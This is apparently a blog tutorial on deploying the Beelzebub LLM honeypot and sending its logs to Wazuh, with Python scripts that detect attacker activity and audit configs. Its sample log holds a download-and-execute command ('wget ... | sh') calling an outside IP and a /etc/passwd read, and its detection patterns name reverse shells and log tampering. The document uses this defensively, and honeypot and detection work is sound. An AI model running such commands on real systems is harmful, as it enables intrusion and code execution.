Deploying an AI Honeypot with Beelzebub + OpenAI: Smarter Traps for Smarter Attackers
What if your honeypot could talk back?
What Is a Honeypot and Why Use One?
In cybersecurity, a honeypot is a decoy system designed to lure in attackers. It acts like a vulnerable server, tempting adversaries to interact with it so you can observe their behavior — all without putting real assets at risk.
Traditional honeypots are static. They use canned responses and limited simulation. They work — but they’re easy to fingerprint. Once attackers realize the system isn’t real, they back off or avoid it entirely.
That’s where Beelzebub comes in.
Beelzebub: The Honeypot with an LLM Brain
Beelzebub is an open-source honeypot framework that integrates large language models (LLMs) such as OpenAI's GPT-4 family to simulate realistic, dynamic system behavior instead of replaying canned responses.
With LLM integration, Beelzebub can:
- Generate terminal-like responses on the fly
- Simulate file system changes
- Maintain session context
- Respond to complex attacker commands
You’re no longer limited to hard-coded scripts. Instead, the honeypot can respond intelligently, just like a real Linux terminal — because it’s powered by AI.
Deploying Beelzebub via Docker
Beelzebub supports deployment via:
- Docker / Docker Compose
- Native Go compiler builds
- Helm charts for Kubernetes
For this walkthrough, we’ll use Docker Compose — the easiest way to get up and running.
Step-by-Step Setup
1. Clone the repo:
git clone https://github.com/mariocandela/beelzebub.git
cd beelzebub
2. Modify your config. The SSH service definition below is the one used in this walkthrough (the per-service YAML files live under the repo's configurations/services directory). Replace the placeholder openAISecretKey with your real key and keep that file out of version control:
apiVersion: "v1"
protocol: "ssh"
address: ":2222"
description: "SSH interactive OpenAI GPT-4"
commands:
  - regex: "^(.+)$"
    plugin: "LLMHoneypot"
serverVersion: "OpenSSH"
serverName: "ubuntu"
passwordRegex: "^(root|qwerty|Smoker666|123456|jenkins|minecraft|sinus|alex|postgres|Ly123456)$"
deadlineTimeoutSeconds: 60
plugin:
  llmProvider: "openai"
  llmModel: "gpt-4o"
  openAISecretKey: "sk-proj-123456"
  prompt: "You will act as an Ubuntu Linux terminal. The user will type commands, and you are to reply with what the terminal should show. Your responses must be contained within a single code block."
3. Build the Docker container:
docker compose build
4. Run the honeypot:
docker compose up -d
5. Optionally expose it to the public internet by adjusting the Docker port bindings or deploying it in a DMZ. Do this from a host that runs nothing else of value: the honeypot is meant to be attacked, and an isolated network segment limits what a successful escape could reach.
Why OpenAI + Honeypots Is a Game-Changer
Once your honeypot is live with LLM support, attackers connecting over SSH or browsing your fake HTTP services will receive believable, dynamic, and context-aware responses.
For example:
- whoami → returns root
- touch test.txt && ls → LLM remembers the file and shows it
- cat /etc/passwd → generates plausible output
You can even simulate realistic HTTP endpoints like /wp-login.php, /admin, or /api/user, with the LLM generating fake logins or API replies on the fly.
Integrating with Wazuh for Detection
Once you've configured your Beelzebub instance to log to a file (the logging settings in beelzebub.yaml), you can:
- Output logs to /opt/beelzebub/logs/beelzebub.log
- Mount that log file into the host via a Docker volume
- Configure the Wazuh agent to monitor it as a JSON log source by adding a localfile block to the agent's ossec.conf:
<localfile>
  <log_format>json</log_format>
  <location>/opt/beelzebub/logs/beelzebub.log</location>
</localfile>
- Create custom Wazuh rules to detect:
- SSH connections to the honeypot
- Suspicious command execution
- HTTP scanner behavior
Example rule snippet: https://github.com/socfortress/Wazuh-Rules/blob/main/Beelzebub/100660-beelzebub.xml
This way, you not only trap attackers, but log everything they do — and feed it right into your SIEM for alerting, threat hunting, or incident response.
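Before wiring the log into Wazuh it is worth confirming that the detections you plan to write actually fire on real lines. The script below is an added example; it is not part of this post, of the SOCFortress rule set linked above, or of Beelzebub. It applies the three detections listed above (SSH logins, suspicious commands, HTTP scanner behaviour) to a handful of constructed beelzebub.log lines. The sample lines and their field names (a top-level "event" object carrying Protocol, SourceIp, DateTime, User, Password, Command and RequestURI) follow Beelzebub's JSON event layout as I know it and are an assumption to check against your own log; the command and probe-path patterns are a starting set, not anything the page prescribes.

```python
"""Run honeypot detections over Beelzebub JSON log lines (added example).

The field names under "event" are an assumption about Beelzebub's log layout;
verify them against a real beelzebub.log before porting the patterns to Wazuh.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one SSH session that fetches and runs a script,
# one HTTP scanner, one benign HTTP request, and a non-JSON line to skip.
SAMPLE_LOG = '''
{"event":{"DateTime":"2025-08-10T09:00:01Z","Protocol":"SSH","SourceIp":"203.0.113.7","User":"root","Password":"123456","Msg":"New SSH attempt"},"level":"info","msg":"New Event"}
{"event":{"DateTime":"2025-08-10T09:00:03Z","Protocol":"SSH","SourceIp":"203.0.113.7","Command":"whoami","CommandOutput":"root","Msg":"New SSH Session"},"level":"info","msg":"New Event"}
{"event":{"DateTime":"2025-08-10T09:00:09Z","Protocol":"SSH","SourceIp":"203.0.113.7","Command":"wget http://198.51.100.9/x.sh -O- | sh","Msg":"New SSH Session"},"level":"info","msg":"New Event"}
{"event":{"DateTime":"2025-08-10T09:00:15Z","Protocol":"SSH","SourceIp":"203.0.113.7","Command":"cat /etc/passwd","Msg":"New SSH Session"},"level":"info","msg":"New Event"}
{"event":{"DateTime":"2025-08-10T09:01:00Z","Protocol":"HTTP","SourceIp":"198.51.100.23","HTTPMethod":"GET","RequestURI":"/wp-login.php","UserAgent":"zgrab/0.x"},"level":"info","msg":"New Event"}
{"event":{"DateTime":"2025-08-10T09:01:01Z","Protocol":"HTTP","SourceIp":"198.51.100.23","HTTPMethod":"GET","RequestURI":"/.env","UserAgent":"zgrab/0.x"},"level":"info","msg":"New Event"}
{"event":{"DateTime":"2025-08-10T09:01:02Z","Protocol":"HTTP","SourceIp":"198.51.100.23","HTTPMethod":"GET","RequestURI":"/admin","UserAgent":"zgrab/0.x"},"level":"info","msg":"New Event"}
{"event":{"DateTime":"2025-08-10T09:01:03Z","Protocol":"HTTP","SourceIp":"198.51.100.23","HTTPMethod":"GET","RequestURI":"/phpmyadmin/","UserAgent":"zgrab/0.x"},"level":"info","msg":"New Event"}
{"event":{"DateTime":"2025-08-10T09:01:04Z","Protocol":"HTTP","SourceIp":"198.51.100.23","HTTPMethod":"GET","RequestURI":"/xmlrpc.php","UserAgent":"zgrab/0.x"},"level":"info","msg":"New Event"}
{"event":{"DateTime":"2025-08-10T09:01:05Z","Protocol":"HTTP","SourceIp":"198.51.100.23","HTTPMethod":"GET","RequestURI":"/api/user","UserAgent":"zgrab/0.x"},"level":"info","msg":"New Event"}
{"event":{"DateTime":"2025-08-10T09:05:00Z","Protocol":"HTTP","SourceIp":"192.0.2.5","HTTPMethod":"GET","RequestURI":"/","UserAgent":"curl/8.5.0"},"level":"info","msg":"New Event"}
beelzebub starting up (not JSON, must be skipped)
'''

# Starting set of command patterns; extend from what your own honeypot sees.
SUSPICIOUS_COMMAND_PATTERNS = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("credential-file-access", re.compile(r"\b(cat|less|more|head|tail)\b.*/etc/(passwd|shadow)")),
    ("make-executable", re.compile(r"\bchmod\s+[+0-7]*x")),
    ("reverse-shell", re.compile(r"\bnc\b.*\s-e\s|/dev/tcp/")),
    ("encoded-payload", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("log-tampering", re.compile(r"\brm\s+(-[rf]+\s+)*/var/log|\bhistory\s+-c\b")),
]
# Paths that legitimate users of a decoy never request.
PROBE_PATHS = re.compile(r"^/(wp-login\.php|xmlrpc\.php|\.env|admin|phpmyadmin)", re.I)


def parse_events(text):
    """Extract the 'event' object from each JSON line; silently skip anything else."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue
        event = record.get("event")
        if isinstance(event, dict):
            events.append(event)
    return events


def _timestamp(event):
    return datetime.fromisoformat(event["DateTime"].replace("Z", "+00:00"))


def ssh_logins(events):
    """(source ip, user, password) for every SSH authentication event."""
    return [(e.get("SourceIp"), e["User"], e.get("Password"))
            for e in events if e.get("Protocol") == "SSH" and "User" in e]


def suspicious_commands(events):
    """(source ip, pattern name, command) for commands matching a known-bad pattern."""
    hits = []
    for e in events:
        command = e.get("Command")
        if not command:
            continue
        for name, pattern in SUSPICIOUS_COMMAND_PATTERNS:
            if pattern.search(command):
                hits.append((e.get("SourceIp"), name, command))
                break
    return hits


def http_scanners(events, distinct_paths=5, window=timedelta(seconds=60)):
    """Map source ip -> reasons, for IPs that hit probe paths or spray many paths quickly."""
    by_ip = defaultdict(list)
    for e in events:
        if e.get("Protocol") == "HTTP" and e.get("RequestURI"):
            by_ip[e.get("SourceIp")].append((_timestamp(e), e["RequestURI"]))
    flagged = {}
    for ip, requests in by_ip.items():
        requests.sort()
        reasons = {"probe-path:" + uri for _, uri in requests if PROBE_PATHS.match(uri)}
        # Sliding window over the sorted requests: distinct paths within `window`.
        for i, (start, _) in enumerate(requests):
            paths = {uri for t, uri in requests[i:] if t - start <= window}
            if len(paths) >= distinct_paths:
                reasons.add("%d-distinct-paths-in-%ds" % (len(paths), window.total_seconds()))
                break
        if reasons:
            flagged[ip] = sorted(reasons)
    return flagged


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print("ssh logins:", ssh_logins(evs))
    print("suspicious commands:", suspicious_commands(evs))
    print("http scanners:", http_scanners(evs))
```

Each function returns structured tuples rather than printing, so the same logic can be unit-tested against saved log samples and then translated rule by rule into Wazuh's XML (the regexes map onto `<field name="event.Command">` style matches; the distinct-path window maps onto a frequency rule). Once the file is in place, a single SSH login to the honeypot should raise the corresponding alert in Wazuh within the agent's log-read interval.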
⚠️ Watch Out: OpenAI API Usage = $$$
If you expose your honeypot to the internet and enable OpenAI integration, every command the LLM plugin handles consumes tokens, and tokens cost money. Note that the config above routes every command to the LLM (regex ^(.+)$), so a scanner looping through a wordlist of commands is billed line by line.
Recommendations:
- Rate-limit connections to the honeypot port (for example with firewall rules in front of it) so that one source cannot burn through your budget
- Avoid an overly permissive regex (^.*$) as the only rule: serve frequent, predictable commands from static handlers and send only the rest to the LLM
- Set a spending limit on the OpenAI account so a runaway session fails closed instead of billing indefinitely
- Consider a local model (e.g., Ollama, LM Studio, GPT4All) if you want to generate responses offline
- Monitor API usage through the OpenAI dashboard
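The following script is an added example, not part of the original post or of the Beelzebub project. It audits a service definition for the two problems that the config step above and this section warn about: a placeholder API key left in the file, and a catch-all regex that hands every command to the LLM with no static handlers in front of it. Both configs are embedded as Python dicts, which is the structure yaml.safe_load would return for the YAML files; the hardened version assumes that Beelzebub's SSH command entries accept a static handler string and are matched in first-match order, as the repo's HTTP examples do. The static responses and the key value "sk-proj-REDACTED" are constructed placeholders.

```python
"""Audit a Beelzebub service definition for LLM-cost and key-hygiene problems.

Added example. The dicts below have the shape yaml.safe_load() returns for
Beelzebub's per-service YAML files; the handlers and key in the hardened
version are constructed placeholders, not values from the project.
"""
import re

# Command regexes that hand every keystroke to the LLM plugin.
CATCH_ALL_REGEXES = {"^(.+)$", "^.+$", "^(.*)$", "^.*$", ".*", ".+"}
# Keys that are obviously not real: empty, sk-123456, sk-proj-123456, sk-xxxx, sk-...
PLACEHOLDER_KEY = re.compile(r"^(sk-(proj-)?)?(\d+|x+|\.{3}|changeme)?$", re.I)


def audit_service(cfg: dict) -> list:
    """Return a list of findings; an empty list means the config passed."""
    findings = []

    plugin = cfg.get("plugin", {})
    if plugin.get("llmProvider") == "openai" and PLACEHOLDER_KEY.match(plugin.get("openAISecretKey", "")):
        findings.append("openAISecretKey is empty or a placeholder: inject the real key at deploy time, never commit it")

    commands = cfg.get("commands", [])
    for idx, cmd in enumerate(commands):
        if cmd.get("plugin") != "LLMHoneypot" or cmd.get("regex") not in CATCH_ALL_REGEXES:
            continue
        # Assumes first-match-wins ordering of command entries.
        if not any("handler" in earlier for earlier in commands[:idx]):
            findings.append("catch-all LLM rule has no static handlers before it: every command costs tokens")
        if idx != len(commands) - 1:
            findings.append("catch-all LLM rule is not last: the rules after it are unreachable")

    if not cfg.get("deadlineTimeoutSeconds"):
        findings.append("deadlineTimeoutSeconds missing: idle sessions are never closed")
    return findings


# The walkthrough's config as shipped: one catch-all, placeholder key.
WEAK_SSH_SERVICE = {
    "apiVersion": "v1", "protocol": "ssh", "address": ":2222",
    "commands": [{"regex": "^(.+)$", "plugin": "LLMHoneypot"}],
    "passwordRegex": "^(root|qwerty|123456)$",
    "deadlineTimeoutSeconds": 60,
    "plugin": {"llmProvider": "openai", "llmModel": "gpt-4o",
               "openAISecretKey": "sk-proj-123456",
               "prompt": "You will act as an Ubuntu Linux terminal."},
}

# Hardened: cheap static answers for the commands every scanner runs first,
# the LLM only for whatever is left, and a key that is not a placeholder.
HARDENED_SSH_SERVICE = {
    "apiVersion": "v1", "protocol": "ssh", "address": ":2222",
    "commands": [
        {"regex": "^whoami$", "handler": "root\n"},
        {"regex": "^id$", "handler": "uid=0(root) gid=0(root) groups=0(root)\n"},
        {"regex": "^uname( -a)?$", "handler": "Linux ubuntu 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux\n"},
        {"regex": "^(exit|logout)$", "handler": ""},
        {"regex": "^(.+)$", "plugin": "LLMHoneypot"},   # everything else still goes to the model
    ],
    "passwordRegex": "^(root|qwerty|123456)$",
    "deadlineTimeoutSeconds": 60,
    "plugin": {"llmProvider": "openai", "llmModel": "gpt-4o",
               "openAISecretKey": "sk-proj-REDACTED",   # constructed stand-in for a key injected at deploy time
               "prompt": "You will act as an Ubuntu Linux terminal."},
}

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SSH_SERVICE), ("hardened", HARDENED_SSH_SERVICE)):
        print(name, "->", audit_service(cfg) or ["ok"])
```

The static handlers also make the honeypot more consistent: whoami and uname now return the same text in every session instead of whatever the model improvises, which is one less tell for an attacker comparing notes across connections.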
Testing the Honeypot
Once deployed:
- SSH to port 2222 (ssh -p 2222 root@<honeypot-host>) and authenticate with one of the passwords accepted by passwordRegex (e.g., root)
- Run commands like:
uname -a
whoami
touch /tmp/test.txt
cat /tmp/test.txt
- Then check beelzebub.log (or the Wazuh dashboard, if you wired it up) and confirm that the login and every command, together with the generated output, were recorded
Beelzebub is one of the most exciting honeypot frameworks I’ve tested lately — thanks to its:
- Plug‑and‑play configuration via YAML
- Multi‑protocol support (SSH, HTTP, MCP, MySQL, etc.)
- AI integration for dynamic, believable deception
- Easy Docker deployment
- Open-source nature
Need Help?
The functionality discussed in this post, and so much more, are available via the SOCFortress platform. Let SOCFortress help you and your team keep your infrastructure secure.
Website: https://www.socfortress.co/
Contact Us: https://www.socfortress.co/contact_form.html